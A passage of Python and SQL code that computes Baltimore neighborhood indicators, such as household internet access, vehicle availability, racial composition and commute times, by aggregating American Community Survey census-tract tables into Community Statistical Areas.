(value[1] + value[2] + value[3] + value[4] + value[5] + value[6] + value[7] + value[8] + value[9] + value[10] + value[11] + value[12] + value[13] + value[14]),
(value[1] + value[2] + value[3] + value[4] + value[5] + value[6] + value[7] + value[8] + value[9] + value[10] + value[11] + value[12] + value[13] + value[14] + value[15]),
(value[1] + value[2] + value[3] + value[4] + value[5] + value[6] + value[7] + value[8] + value[9] + value[10] + value[11] + value[12] + value[13] + value[14] + value[15] + value[16])
] as agg,
value[17] as median,
variable from tbl_csa
),
csa_agg2 as (
select csa,count,median,total,agg,variable,
agg[16]/2::numeric as midpoint from csa_agg
),
csa_agg3 as (
select csa,count,median,total,agg,variable,midpoint,
(case
when midpoint <= agg[1] then 1
when midpoint > agg[1] and midpoint <= agg[2] then 2
when midpoint > agg[2] and midpoint <= agg[3] then 3
when midpoint > agg[3] and midpoint <= agg[4] then 4
when midpoint > agg[4] and midpoint <= agg[5] then 5
when midpoint > agg[5] and midpoint <= agg[6] then 6
when midpoint > agg[6] and midpoint <= agg[7] then 7
when midpoint > agg[7] and midpoint <= agg[8] then 8
when midpoint > agg[8] and midpoint <= agg[9] then 9
when midpoint > agg[9] and midpoint <= agg[10] then 10
when midpoint > agg[10] and midpoint <= agg[11] then 11
when midpoint > agg[11] and midpoint <= agg[12] then 12
when midpoint > agg[12] and midpoint <= agg[13] then 13
when midpoint > agg[13] and midpoint <= agg[14] then 14
when midpoint > agg[14] and midpoint <= agg[15] then 15
when midpoint > agg[15] and midpoint <= agg[16] then 16
when midpoint > agg[16] then 17
end) as midpoint_idx from csa_agg2
),
csa_agg4 as (
select csa,count,median,total,agg,variable,midpoint,midpoint_idx,
total[midpoint_idx] as midpoint_total,
(case
when (midpoint_idx - 1) = 0 then 0
else total[(midpoint_idx - 1)]
end) as midpoint_upto_total,
agg[midpoint_idx] as midpoint_agg, (case when (midpoint_idx - 1) = 0 then 0 else agg[(midpoint_idx - 1)] end) as midpoint_upto_agg,
variable[midpoint_idx] as midpoint_variable
from csa_agg3
),
csa_agg5 as (
select a.*,b.lower as midpoint_lower, b.range as midpoint_range from
csa_agg4 a left join info b on a.midpoint_variable = b.variable
),
tbl as (
select (CASE
when count = 1 OR csa = 'Baltimore City'
then median
else
(midpoint_lower::numeric +
(midpoint_range::numeric * (
(midpoint - midpoint_upto_agg) / nullif(midpoint_total,0)
)
)
)
END) as result,csa
from csa_agg5
)
UPDATE vital_signs.data
set mhhi = result from tbl where data.csa = tbl.csa and update_data_year = '2014' and data_year = '2014';
"""
# Cell
#File: nohhint.py
#Author: Charles Karpati
#Date: 1/25/19
#Section: Bnia
#Email: karpati1@umbc.edu
#Description:
# Uses ACS Table B28011 - INTERNET SUBSCRIPTIONS IN HOUSEHOLD
# Universe: Households
#purpose: Produce Percent of Households with No Internet at Home Indicator
#input: Year
#output:
import pandas as pd
import glob
def nohhint( year ):
def getColName (df, col): return df.columns[df.columns.str.contains(pat = col)][0]
def getColByName (df, col): return df[getColName(df, col)]
def addKey(df, fi, col):
key = getColName(df, col)
val = getColByName(df, col)
fi[key] = val
return fi
def nullIfEqual(df, c1, c2):
return df.apply(lambda x:
x[getColName(df, c1)]+x[getColName(df, c2)] if x[getColName(df, c1)]+x[getColName(df, c2)] != 0 else 0, axis=1)
def sumInts(df): return df.sum(numeric_only=True)
#~~~~~~~~~~~~~~~
# Step 1)
# Fetch Tract Files w/CSA Labels by Name from the 2_cleaned folder.
#~~~~~~~~~~~~~~~
fileName = ''
for name in glob.glob('AcsDataClean/B28011*5y'+str(year)+'_est.csv'):
fileName = name
df = pd.read_csv( fileName, index_col=0 )
# Aggregate by CSA
# Group By CSA so that they may be operated on
df = df.groupby('CSA')
# Aggregate Numeric Values by Sum
df = sumInts(df)
#~~~~~~~~~~~~~~~
# Step 2)
# Prepare the columns
#~~~~~~~~~~~~~~~
# Final Dataframe
fi = pd.DataFrame()
columns = ['B28011_001E', 'B28011_008E']
for col in columns:
fi = addKey(df, fi, col)
# Numerators
numerators = pd.DataFrame()
columns = ['B28011_008E']
for col in columns:
numerators = addKey(df, numerators, col)
# Denominators
denominators = pd.DataFrame()
columns = ['B28011_001E']
for col in columns:
denominators = addKey(df, denominators, col)
# (Numerator and denominator are combined in Step 3; zero-denominator rows are dropped there.)
#~~~~~~~~~~~~~~~
# Step 3)
# Run the Calculation
# ( B28011_008E / nullif(B28011_001E,0) )*100
#~~~~~~~~~~~~~~~
fi['numerator'] = numerators.sum(axis=1)
fi['denominator'] = denominators.sum(axis=1)
fi = fi[fi['denominator'] != 0] # Delete Rows where the 'denominator' column is 0
fi['final'] = (fi['numerator'] / fi['denominator'] ) * 100
return fi['final']
"""
/* <affordm_14> */ --
WITH tbl AS (
select csa,
( (value[1]+value[2]+value[3]+value[4]) / nullif(value[5],0) )*100::numeric as result
from vital_signs.get_acs_vars_csa_and_bc('2014',ARRAY['B25091_008E','B25091_009E','B25091_010E','B25091_011E','B25091_002E'])
)
update vital_signs.data
set affordm = result from tbl where data.csa = tbl.csa and update_data_year = '2014' and data_year = '2014';
"""
# Cell
#File: novhcl.py
#Author: Charles Karpati
#Date: 1/17/19
#Section: Bnia
#Email: karpati1@umbc.edu
#Description:
# Uses ACS Table B08201 - HOUSEHOLD SIZE BY VEHICLES AVAILABLE
# Universe: Households
#purpose: Produce Sustainability - Percent of Households with No Vehicles Available Indicator
#input: Year
#output:
import pandas as pd
import glob
def novhcl( year ):
def getColName (df, col): return df.columns[df.columns.str.contains(pat = col)][0]
def getColByName (df, col): return df[getColName(df, col)]
def addKey(df, fi, col):
key = getColName(df, col)
val = getColByName(df, col)
fi[key] = val
return fi
def nullIfEqual(df, c1, c2):
return df.apply(lambda x:
x[getColName(df, c1)]+x[getColName(df, c2)] if x[getColName(df, c1)]+x[getColName(df, c2)] != 0 else 0, axis=1)
def sumInts(df): return df.sum(numeric_only=True)
#~~~~~~~~~~~~~~~
# Step 1)
# Fetch Tract Files w/CSA Labels by Name from the 2_cleaned folder.
#~~~~~~~~~~~~~~~
fileName = ''
for name in glob.glob('AcsDataClean/B08201*5y'+str(year)+'_est.csv'):
fileName = name
df = pd.read_csv( fileName, index_col=0 )
# Aggregate by CSA
# Group By CSA so that they may be operated on
df = df.groupby('CSA')
# Aggregate Numeric Values by Sum
df = sumInts(df)
# Add 'BALTIMORE' which is the SUM of all the CSAs
#~~~~~~~~~~~~~~~
# Step 2)
# Prepare the columns
#~~~~~~~~~~~~~~~
# Final Dataframe
fi = pd.DataFrame()
columns = ['B08201_002E','B08201_001E']
for col in columns:
fi = addKey(df, fi, col)
# Numerators
numerators = pd.DataFrame()
columns = ['B08201_002E']
for col in columns:
numerators = addKey(df, numerators, col)
# Denominators
denominators = pd.DataFrame()
columns = ['B08201_001E']
for col in columns:
denominators = addKey(df, denominators, col)
# (Numerator and denominator are combined in Step 3; zero-denominator rows are dropped there.)
#~~~~~~~~~~~~~~~
# Step 3)
# Run the Calculation
# ( value[1]/ nullif(value[2],0) )*100
#~~~~~~~~~~~~~~~
fi['numerator'] = numerators.sum(axis=1)
fi['denominator'] = denominators.sum(axis=1)
fi = fi[fi['denominator'] != 0] # Delete Rows where the 'denominator' column is 0
fi['final'] = (fi['numerator'] / fi['denominator'] ) * 100
return fi['final']
"""
/* <novhcl_14> */ --
WITH tbl AS (
select csa,
( value[1]/ nullif(value[2],0) )*100::numeric as result
from vital_signs.get_acs_vars_csa_and_bc('2014',ARRAY['B08201_002E','B08201_001E'])
)
update vital_signs.data
set novhcl = result from tbl where data.csa = tbl.csa and update_data_year = '2014' and data_year = '2014';
"""
# Cell
#File: paa.py
#Author: Charles Karpati
#Date: 4/16/19
#Section: Bnia
#Email: karpati1@umbc.edu
#Description:
# Uses ACS Table B03002 - HISPANIC OR LATINO ORIGIN BY RACE
# Universe: Total Population
# Table Creates: racdiv, paa, pwhite, pasi, phisp, p2more, ppac
#purpose:
#input: Year
#output:
import pandas as pd
import glob
def paa( year ):
def getColName (df, col): return df.columns[df.columns.str.contains(pat = col)][0]
def getColByName (df, col): return df[getColName(df, col)]
def addKey(df, fi, col):
key = getColName(df, col)
val = getColByName(df, col)
fi[key] = val
return fi
def nullIfEqual(df, c1, c2):
return df.apply(lambda x:
x[getColName(df, c1)]+x[getColName(df, c2)] if x[getColName(df, c1)]+x[getColName(df, c2)] != 0 else 0, axis=1)
def sumInts(df): return df.sum(numeric_only=True)
#~~~~~~~~~~~~~~~
# Step 1)
# Fetch Tract Files w/CSA Labels by Name from the 2_cleaned folder.
#~~~~~~~~~~~~~~~
fileName = ''
for name in glob.glob('AcsDataClean/B03002*5y'+str(year)+'_est.csv'):
fileName = name
df = pd.read_csv( fileName, index_col=0 )
# Aggregate by CSA
# Group By CSA so that they may be operated on
df = df.groupby('CSA')
# Aggregate Numeric Values by Sum
df = df.sum(numeric_only=True)
# Touch the companion-table column so a missing column fails fast (KeyError)
df['B03002_012E_Total_Hispanic_or_Latino']
df1 = pd.DataFrame()
df1['CSA'] = df.index
df1.set_index('CSA', drop = True, inplace = True)
tot = df[ 'B03002_001E_Total' ]
df1['African-American%NH'] = df[ 'B03002_004E_Total_Not_Hispanic_or_Latino_Black_or_African_American_alone' ]/ tot * 100
return df1['African-American%NH']
# Cell
#File: ppac.py
#Author: Charles Karpati
#Date: 4/16/19
#Section: Bnia
#Email: karpati1@umbc.edu
#Description:
# Uses ACS Table B03002 - HISPANIC OR LATINO ORIGIN BY RACE
# Universe: Total Population
# Table Creates: racdiv, paa, pwhite, pasi, phisp, p2more, ppac
#purpose:
#input: Year
#output:
import pandas as pd
import glob
def ppac( year ):
def getColName (df, col): return df.columns[df.columns.str.contains(pat = col)][0]
def getColByName (df, col): return df[getColName(df, col)]
def addKey(df, fi, col):
key = getColName(df, col)
val = getColByName(df, col)
fi[key] = val
return fi
def nullIfEqual(df, c1, c2):
return df.apply(lambda x:
x[getColName(df, c1)]+x[getColName(df, c2)] if x[getColName(df, c1)]+x[getColName(df, c2)] != 0 else 0, axis=1)
def sumInts(df): return df.sum(numeric_only=True)
#~~~~~~~~~~~~~~~
# Step 1)
# Fetch Tract Files w/CSA Labels by Name from the 2_cleaned folder.
#~~~~~~~~~~~~~~~
fileName = ''
for name in glob.glob('AcsDataClean/B03002*5y'+str(year)+'_est.csv'):
fileName = name
df = pd.read_csv( fileName, index_col=0 )
# Aggregate by CSA
# Group By CSA so that they may be operated on
df = df.groupby('CSA')
# Aggregate Numeric Values by Sum
df = df.sum(numeric_only=True)
# Touch the companion-table column so a missing column fails fast (KeyError)
df['B03002_012E_Total_Hispanic_or_Latino']
df1 = pd.DataFrame()
df1['CSA'] = df.index
df1.set_index('CSA', drop = True, inplace = True)
tot = df[ 'B03002_001E_Total' ]
df1['AllOther%NH'] = (
df['B03002_008E_Total_Not_Hispanic_or_Latino_Some_other_race_alone']
+ df['B03002_005E_Total_Not_Hispanic_or_Latino_American_Indian_and_Alaska_Native_alone']
+ df['B03002_007E_Total_Not_Hispanic_or_Latino_Native_Hawaiian_and_Other_Pacific_Islander_alone']
)/ tot * 100
return df1['AllOther%NH']
# Cell
#File: phisp.py
#Author: Charles Karpati
#Date: 4/16/19
#Section: Bnia
#Email: karpati1@umbc.edu
#Description:
# Uses ACS Table B03002 - HISPANIC OR LATINO ORIGIN BY RACE
# Universe: Total Population
# Table Creates: racdiv, paa, pwhite, pasi, phisp, p2more, ppac
#purpose:
#input: Year
#output:
import pandas as pd
import glob
def phisp( year ):
def getColName (df, col): return df.columns[df.columns.str.contains(pat = col)][0]
def getColByName (df, col): return df[getColName(df, col)]
def addKey(df, fi, col):
key = getColName(df, col)
val = getColByName(df, col)
fi[key] = val
return fi
def nullIfEqual(df, c1, c2):
return df.apply(lambda x:
x[getColName(df, c1)]+x[getColName(df, c2)] if x[getColName(df, c1)]+x[getColName(df, c2)] != 0 else 0, axis=1)
def sumInts(df): return df.sum(numeric_only=True)
#~~~~~~~~~~~~~~~
# Step 1)
# Fetch Tract Files w/CSA Labels by Name from the 2_cleaned folder.
#~~~~~~~~~~~~~~~
fileName = ''
for name in glob.glob('AcsDataClean/B03002*5y'+str(year)+'_est.csv'):
fileName = name
df = pd.read_csv( fileName, index_col=0 )
# Aggregate by CSA
# Group By CSA so that they may be operated on
df = df.groupby('CSA')
# Aggregate Numeric Values by Sum
df = df.sum(numeric_only=True)
# Touch the companion-table column so a missing column fails fast (KeyError)
df['B03002_012E_Total_Hispanic_or_Latino']
df1 = pd.DataFrame()
df1['CSA'] = df.index
df1.set_index('CSA', drop = True, inplace = True)
tot = df[ 'B03002_001E_Total' ]
df1['Hisp%'] = df['B03002_012E_Total_Hispanic_or_Latino']/ tot * 100
return df1['Hisp%']
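Step 1 in each of the B03002-based indicators is a plain tract-to-CSA rollup: group by the CSA label, sum the counts, then take a share of the total. A toy sketch with invented counts (not real ACS data):

```python
import pandas as pd

# Three tract rows, each tagged with its CSA; counts are made up.
tracts = pd.DataFrame({
    'CSA': ['Downtown', 'Downtown', 'Midtown'],
    'B03002_001E_Total': [100.0, 150.0, 200.0],
    'B03002_012E_Total_Hispanic_or_Latino': [10.0, 20.0, 30.0],
})
csa = tracts.groupby('CSA').sum(numeric_only=True)   # one row per CSA
hisp_pct = csa['B03002_012E_Total_Hispanic_or_Latino'] / csa['B03002_001E_Total'] * 100
```

Downtown aggregates to (10 + 20) / (100 + 150) * 100 = 12%, Midtown to 30 / 200 * 100 = 15%.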
# Cell
#File: pwhite.py
#Author: Charles Karpati
#Date: 4/16/19
#Section: Bnia
#Email: karpati1@umbc.edu
#Description:
# Uses ACS Table B03002 - HISPANIC OR LATINO ORIGIN BY RACE
# Universe: Total Population
# Table Creates: racdiv, paa, pwhite, pasi, phisp, p2more, ppac
#purpose:
#input: Year
#output:
import pandas as pd
import glob
def pwhite( year ):
def getColName (df, col): return df.columns[df.columns.str.contains(pat = col)][0]
def getColByName (df, col): return df[getColName(df, col)]
def addKey(df, fi, col):
key = getColName(df, col)
val = getColByName(df, col)
fi[key] = val
return fi
def nullIfEqual(df, c1, c2):
return df.apply(lambda x:
x[getColName(df, c1)]+x[getColName(df, c2)] if x[getColName(df, c1)]+x[getColName(df, c2)] != 0 else 0, axis=1)
def sumInts(df): return df.sum(numeric_only=True)
#~~~~~~~~~~~~~~~
# Step 1)
# Fetch Tract Files w/CSA Labels by Name from the 2_cleaned folder.
#~~~~~~~~~~~~~~~
fileName = ''
for name in glob.glob('AcsDataClean/B03002*5y'+str(year)+'_est.csv'):
fileName = name
df = pd.read_csv( fileName, index_col=0 )
# Aggregate by CSA
# Group By CSA so that they may be operated on
df = df.groupby('CSA')
# Aggregate Numeric Values by Sum
df = df.sum(numeric_only=True)
# Touch the companion-table column so a missing column fails fast (KeyError)
df['B03002_012E_Total_Hispanic_or_Latino']
df1 = pd.DataFrame()
df1['CSA'] = df.index
df1.set_index('CSA', drop = True, inplace = True)
tot = df[ 'B03002_001E_Total' ]
df1['White%NH'] = df[ 'B03002_003E_Total_Not_Hispanic_or_Latino_White_alone' ]/ tot * 100
return df1['White%NH']
# Cell
#File: sclemp.py
#Author: Charles Karpati
#Date: 1/17/19
#Section: Bnia
#Email: karpati1@umbc.edu
#Description:
# Uses ACS Table B14005 - SEX BY SCHOOL ENROLLMENT BY EDUCATIONAL ATTAINMENT BY EMPLOYMENT STATUS FOR THE POPULATION 16 TO 19 YEARS
# (Universe = Population 16 to 19 years)
#purpose: Produce Education and Youth - Percentage of Population aged 16-19 in School and/or Employed Indicator
#input: Year
#output:
import pandas as pd
import glob
def sclemp( year ):
def getColName (df, col): return df.columns[df.columns.str.contains(pat = col)][0]
def getColByName (df, col): return df[getColName(df, col)]
def addKey(df, fi, col):
key = getColName(df, col)
val = getColByName(df, col)
fi[key] = val
return fi
def nullIfEqual(df, c1, c2):
return df.apply(lambda x:
x[getColName(df, c1)]+x[getColName(df, c2)] if x[getColName(df, c1)]+x[getColName(df, c2)] != 0 else 0, axis=1)
def sumInts(df): return df.sum(numeric_only=True)
#~~~~~~~~~~~~~~~
# Step 1)
# Fetch Tract Files w/CSA Labels by Name from the 2_cleaned folder.
#~~~~~~~~~~~~~~~
fileName = ''
for name in glob.glob('AcsDataClean/B14005*5y'+str(year)+'_est.csv'):
fileName = name
df = pd.read_csv( fileName, index_col=0 )
# Aggregate by CSA
# Group By CSA so that they may be operated on
df = df.groupby('CSA')
# Aggregate Numeric Values by Sum
df = sumInts(df)
# Add 'BALTIMORE' which is the SUM of all the CSAs
#~~~~~~~~~~~~~~~
# Step 2)
# Prepare the columns
#~~~~~~~~~~~~~~~
# Final Dataframe
fi = pd.DataFrame()
columns = ['B14005_004E', 'B14005_005E', 'B14005_006E', 'B14005_009E', 'B14005_013E', 'B14005_018E', 'B14005_019E',
'B14005_020E', 'B14005_023E', 'B14005_027E','B14005_001E']
for col in columns:
fi = addKey(df, fi, col)
# Numerators
numerators = pd.DataFrame()
columns = ['B14005_004E', 'B14005_005E', 'B14005_006E', 'B14005_009E', 'B14005_013E', 'B14005_018E', 'B14005_019E', 'B14005_020E', 'B14005_023E', 'B14005_027E']
for col in columns:
numerators = addKey(df, numerators, col)
# Denominators
denominators = pd.DataFrame()
columns = ['B14005_001E']
for col in columns:
denominators = addKey(df, denominators, col)
# (Numerator and denominator are combined in Step 3; zero-denominator rows are dropped there.)
#~~~~~~~~~~~~~~~
# Step 3)
# Run the Calculation
# ( ( value[1] + value[2] + value[3] + value[4] + value[5] + value[6] + value[7] + value[8] + value[9] + value[10] ) / nullif(value[11],0) )*100
#~~~~~~~~~~~~~~~
fi['numerator'] = numerators.sum(axis=1)
fi['denominator'] = denominators.sum(axis=1)
fi = fi[fi['denominator'] != 0] # Delete Rows where the 'denominator' column is 0
fi['final'] = (fi['numerator'] / fi['denominator'] ) * 100
return fi['final']
"""
/* <sclemp_14> */ --
WITH tbl AS (
select csa,
( ( value[1] + value[2] + value[3] + value[4] + value[5] + value[6] + value[7] + value[8] + value[9] + value[10] ) / nullif(value[11],0) )*100::numeric as result
from vital_signs.get_acs_vars_csa_and_bc('2014',ARRAY['B14005_004E', 'B14005_005E', 'B14005_006E', 'B14005_009E', 'B14005_013E', 'B14005_018E', 'B14005_019E', 'B14005_020E', 'B14005_023E', 'B14005_027E','B14005_001E']) )
update vital_signs.data
set sclemp = result from tbl where data.csa = tbl.csa and update_data_year = '2014' and data_year = '2014';
"""
# Cell
#File: tpop.py
#Author: Charles Karpati
#Date: 4/16/19
#Section: Bnia
#Email: karpati1@umbc.edu
#Description:
# Uses ACS Table B01001 - SEX BY AGE
# Universe: Total population
# Table Creates: tpop, female, male, age5 age18 age24 age64 age65
#purpose:
#input: Year
#output:
import pandas as pd
import glob
def tpop( year ):
def getColName (df, col): return df.columns[df.columns.str.contains(pat = col)][0]
def getColByName (df, col): return df[getColName(df, col)]
def addKey(df, fi, col):
key = getColName(df, col)
val = getColByName(df, col)
fi[key] = val
return fi
def nullIfEqual(df, c1, c2):
return df.apply(lambda x:
x[getColName(df, c1)]+x[getColName(df, c2)] if x[getColName(df, c1)]+x[getColName(df, c2)] != 0 else 0, axis=1)
def sumInts(df): return df.sum(numeric_only=True)
#~~~~~~~~~~~~~~~
# Step 1)
# Fetch Tract Files w/CSA Labels by Name from the 2_cleaned folder.
#~~~~~~~~~~~~~~~
fileName = ''
for name in glob.glob('AcsDataClean/B01001*5y'+str(year)+'_est.csv'):
fileName = name
df = pd.read_csv( fileName, index_col=0 )
# Aggregate by CSA
# Group By CSA so that they may be operated on
df = df.groupby('CSA')
# Aggregate Numeric Values by Sum
df = df.sum(numeric_only=True)
total = df['B01001_001E_Total']
df1 = pd.DataFrame()
df1['CSA'] = df.index
df1.set_index('CSA', drop = True, inplace = True)
df1['totalPop'] = total
return df1['totalPop']
# Cell
#File: trav14.py
#Author: Charles Karpati
#Date: 1/17/19
#Section: Bnia
#Email: karpati1@umbc.edu
#Description:
# Uses ACS Table B08303 - TRAVEL TIME TO WORK,
# (Universe: Workers 16 years and over who did not work at home)
# Table Creates: trav14, trav29, trav44, trav45
#purpose: Produce Sustainability - Percent of Employed Population with Travel Time to Work of 0-14 Minutes Indicator
#input: Year
#output:
import pandas as pd
import glob
def trav14( year ):
def getColName (df, col): return df.columns[df.columns.str.contains(pat = col)][0]
def getColByName (df, col): return df[getColName(df, col)]
def addKey(df, fi, col):
key = getColName(df, col)
val = getColByName(df, col)
fi[key] = val
return fi
def nullIfEqual(df, c1, c2):
return df.apply(lambda x:
x[getColName(df, c1)]+x[getColName(df, c2)] if x[getColName(df, c1)]+x[getColName(df, c2)] != 0 else 0, axis=1)
def sumInts(df): return df.sum(numeric_only=True)
#~~~~~~~~~~~~~~~
# Step 1)
# Fetch Tract Files w/CSA Labels by Name from the 2_cleaned folder.
#~~~~~~~~~~~~~~~
fileName = ''
for name in glob.glob('AcsDataClean/B08303*5y'+str(year)+'_est.csv'):
fileName = name
df = pd.read_csv( fileName, index_col=0 )
# Aggregate by CSA
# Group By CSA so that they may be operated on
df = df.groupby('CSA')
# Aggregate Numeric Values by Sum
df = sumInts(df)
# Add 'BALTIMORE' which is the SUM of all the CSAs
#~~~~~~~~~~~~~~~
# Step 2)
# Prepare the columns
#~~~~~~~~~~~~~~~
# Final Dataframe
fi = pd.DataFrame()
columns = ['B08303_002E','B08303_003E','B08303_004E','B08303_001E']
for col in columns:
fi = addKey(df, fi, col)
# Numerators
numerators = pd.DataFrame()
columns = ['B08303_002E','B08303_003E','B08303_004E']
for col in columns:
numerators = addKey(df, numerators, col)
# Denominators
denominators = pd.DataFrame()
columns = ['B08303_001E']
for col in columns:
denominators = addKey(df, denominators, col)
# (Numerator and denominator are combined in Step 3; zero-denominator rows are dropped there.)
#~~~~~~~~~~~~~~~
# Step 3)
# Run the Calculation
# ( (value[1] + value[2] + value[3] ) / nullif(value[4],0) )*100
#~~~~~~~~~~~~~~~
fi['numerator'] = numerators.sum(axis=1)
fi['denominator'] = denominators.sum(axis=1)
fi = fi[fi['denominator'] != 0] # Delete Rows where the 'denominator' column is 0
fi['final'] = (fi['numerator'] / fi['denominator'] ) * 100
return fi['final']
"""
/* <trav14_14> */ --
WITH tbl AS (
select csa,
( (value[1] + value[2] + value[3] ) / nullif(value[4],0) )*100::numeric as result
from vital_signs.get_acs_vars_csa_and_bc('2014',ARRAY['B08303_002E','B08303_003E','B08303_004E','B08303_001E'])
)
update vital_signs.data
set trav14_ = result from tbl where data.csa = tbl.csa and update_data_year = '2014' and data_year = '2014';
"""
# Cell
#File: trav29.py
#Author: Charles Karpati
#Date: 1/17/19
#Section: Bnia
#Email: karpati1@umbc.edu
#Description:
# Uses ACS Table B08303 - TRAVEL TIME TO WORK,
# (Universe: Workers 16 years and over who did not work at home)
# Table Creates: trav14, trav29, trav44, trav45
#purpose: Produce Sustainability - Percent of Employed Population with Travel Time to Work of 15-29 Minutes Indicator
#input: Year
#output:
import pandas as pd
import glob
def trav29( year ):
def getColName (df, col): return df.columns[df.columns.str.contains(pat = col)][0]
def getColByName (df, col): return df[getColName(df, col)]
def addKey(df, fi, col):
key = getColName(df, col)
val = getColByName(df, col)
fi[key] = val
return fi
def nullIfEqual(df, c1, c2):
return df.apply(lambda x:
x[getColName(df, c1)]+x[getColName(df, c2)] if x[getColName(df, c1)]+x[getColName(df, c2)] != 0 else 0, axis=1)
def sumInts(df): return df.sum(numeric_only=True)
#~~~~~~~~~~~~~~~
# Step 1)
# Fetch Tract Files w/CSA Labels by Name from the 2_cleaned folder.
#~~~~~~~~~~~~~~~
fileName = ''
for name in glob.glob('AcsDataClean/B08303*5y'+str(year)+'_est.csv'):
fileName = name
df = pd.read_csv( fileName, index_col=0 )
# Aggregate by CSA
# Group By CSA so that they may be operated on
df = df.groupby('CSA')
# Aggregate Numeric Values by Sum
df = sumInts(df)
# Add 'BALTIMORE' which is the SUM of all the CSAs
#~~~~~~~~~~~~~~~
# Step 2)
# Prepare the columns
#~~~~~~~~~~~~~~~
# Final Dataframe
fi = pd.DataFrame()
columns = ['B08303_005E','B08303_006E','B08303_007E','B08303_001E']
for col in columns:
fi = addKey(df, fi, col)
# Numerators
numerators = pd.DataFrame()
columns = ['B08303_005E','B08303_006E','B08303_007E']
for col in columns:
numerators = addKey(df, numerators, col)
# Denominators
denominators = pd.DataFrame()
columns = ['B08303_001E']
for col in columns:
denominators = addKey(df, denominators, col)
# (Numerator and denominator are combined in Step 3; zero-denominator rows are dropped there.)
#~~~~~~~~~~~~~~~
# Step 3)
# Run the Calculation
# ( (value[1] + value[2] + value[3] ) / nullif(value[4],0) )*100
#~~~~~~~~~~~~~~~
fi['numerator'] = numerators.sum(axis=1)
fi['denominator'] = denominators.sum(axis=1)
fi = fi[fi['denominator'] != 0] # Delete Rows where the 'denominator' column is 0
fi['final'] = (fi['numerator'] / fi['denominator'] ) * 100
return fi['final']
"""
/* <trav29_14> */ --
WITH tbl AS (
select csa,
( (value[1] + value[2] + value[3] ) / nullif(value[4],0) )*100::numeric as result
from vital_signs.get_acs_vars_csa_and_bc('2014',ARRAY['B08303_005E','B08303_006E','B08303_007E','B08303_001E'])
)
update vital_signs.data
set trav29_ = result from tbl where data.csa = tbl.csa and update_data_year = '2014' and data_year = '2014';
"""
# Cell
#File: trav45.py
#Author: Charles Karpati
#Date: 1/17/19
#Section: Bnia
#Email: karpati1@umbc.edu
#Description:
# Uses ACS Table B08303 - TRAVEL TIME TO WORK,
# (Universe: Workers 16 years and over who did not work at home)
# Table Creates: trav14, trav29, trav44, trav45
#purpose: Produce Sustainability - Percent of Employed Population with Travel Time to Work of 45 Minutes and Over Indicator
#input: Year
#output:
import pandas as pd
import glob
def trav45( year ):
def getColName (df, col): return df.columns[df.columns.str.contains(pat = col)][0]
def getColByName (df, col): return df[getColName(df, col)]
def addKey(df, fi, col):
key = getColName(df, col)
val = getColByName(df, col)
fi[key] = val
return fi
def nullIfEqual(df, c1, c2):
return df.apply(lambda x:
x[getColName(df, c1)]+x[getColName(df, c2)] if x[getColName(df, c1)]+x[getColName(df, c2)] != 0 else 0, axis=1)
def sumInts(df): return df.sum(numeric_only=True)
#~~~~~~~~~~~~~~~
# Step 1)
# Fetch Tract Files w/CSA Labels by Name from the 2_cleaned folder.
#~~~~~~~~~~~~~~~
fileName = ''
for name in glob.glob('AcsDataClean/B08303*5y'+str(year)+'_est.csv'):
fileName = name
df = pd.read_csv( fileName, index_col=0 )
# Aggregate by CSA
# Group By CSA so that they may be operated on
df = df.groupby('CSA')
# Aggregate Numeric Values by Sum
df = sumInts(df)
# Add 'BALTIMORE' which is the SUM of all the CSAs
#~~~~~~~~~~~~~~~
# Step 2)
# Prepare the columns
#~~~~~~~~~~~~~~~
# Final Dataframe
fi = pd.DataFrame()
columns = ['B08303_011E','B08303_012E','B08303_013E','B08303_001E']
for col in columns:
fi = addKey(df, fi, col)
# Numerators
numerators = pd.DataFrame()
columns = ['B08303_011E','B08303_012E','B08303_013E']
for col in columns:
numerators = addKey(df, numerators, col)
# Denominators
denominators = pd.DataFrame()
columns = ['B08303_001E']
for col in columns:
denominators = addKey(df, denominators, col)
# (Numerator and denominator are combined in Step 3; zero-denominator rows are dropped there.)
#~~~~~~~~~~~~~~~
# Step 3)
# Run the Calculation
# ( (value[1] + value[2] + value[3] ) / nullif(value[4],0) )*100
#~~~~~~~~~~~~~~~
fi['numerator'] = numerators.sum(axis=1)
fi['denominator'] = denominators.sum(axis=1)
fi = fi[fi['denominator'] != 0] # Delete Rows where the 'denominator' column is 0
fi['final'] = (fi['numerator'] / fi['denominator'] ) * 100
return fi['final']
"""
/* <trav45_14> */ --
WITH tbl AS (
select csa,
( (value[1] + value[2] + value[3] ) / nullif(value[4],0) )*100::numeric as result
from vital_signs.get_acs_vars_csa_and_bc('2014',ARRAY['B08303_011E','B08303_012E','B08303_013E','B08303_001E'])
)
update vital_signs.data
set trav45_ = result from tbl where data.csa = tbl.csa and update_data_year = '2014' and data_year = '2014';
"""
# Cell
#File: trav44.py
#Author: Charles Karpati
#Date: 1/17/19
#Section: Bnia
#Email: karpati1@umbc.edu
#Description:
# Uses ACS Table B08303 - TRAVEL TIME TO WORK,
# (Universe: Workers 16 years and over who did not work at home)
# Table Creates: trav14, trav29, trav44, trav45
#purpose: Produce Sustainability - Percent of Employed Population with Travel Time to Work of 30-44 Minutes Indicator
#input: Year
#output:
import pandas as pd
import glob
def trav44( year ):
def getColName (df, col): return df.columns[df.columns.str.contains(pat = col)][0]
def getColByName (df, col): return df[getColName(df, col)]
def addKey(df, fi, col):
key = getColName(df, col)
val = getColByName(df, col)
fi[key] = val
return fi
def nullIfEqual(df, c1, c2):
return df.apply(lambda x:
x[getColName(df, c1)]+x[getColName(df, c2)] if x[getColName(df, c1)]+x[getColName(df, c2)] != 0 else 0, axis=1)
def sumInts(df): return df.sum(numeric_only=True)
#~~~~~~~~~~~~~~~
# Step 1)
# Fetch Tract Files w/CSA Labels by Name from the 2_cleaned folder.
#~~~~~~~~~~~~~~~
fileName = ''
for name in glob.glob('AcsDataClean/B08303*5y'+str(year)+'_est.csv'):
fileName = name
df = pd.read_csv( fileName, index_col=0 )
# Aggregate by CSA
# Group By CSA so that they may be operated on
df = df.groupby('CSA')
# Aggregate Numeric Values by Sum
df = sumInts(df)
# Add 'BALTIMORE' which is the SUM of all the CSAs
#~~~~~~~~~~~~~~~
# Step 2)
# Prepare the columns
#~~~~~~~~~~~~~~~
# Final Dataframe
fi = pd.DataFrame()
columns = ['B08303_008E','B08303_009E','B08303_010E','B08303_001E']
for col in columns:
fi = addKey(df, fi, col)
# Numerators
numerators = pd.DataFrame()
columns = ['B08303_008E','B08303_009E','B08303_010E']
for col in columns:
numerators = addKey(df, numerators, col)
# Denominators
denominators = pd.DataFrame()
columns = ['B08303_001E']
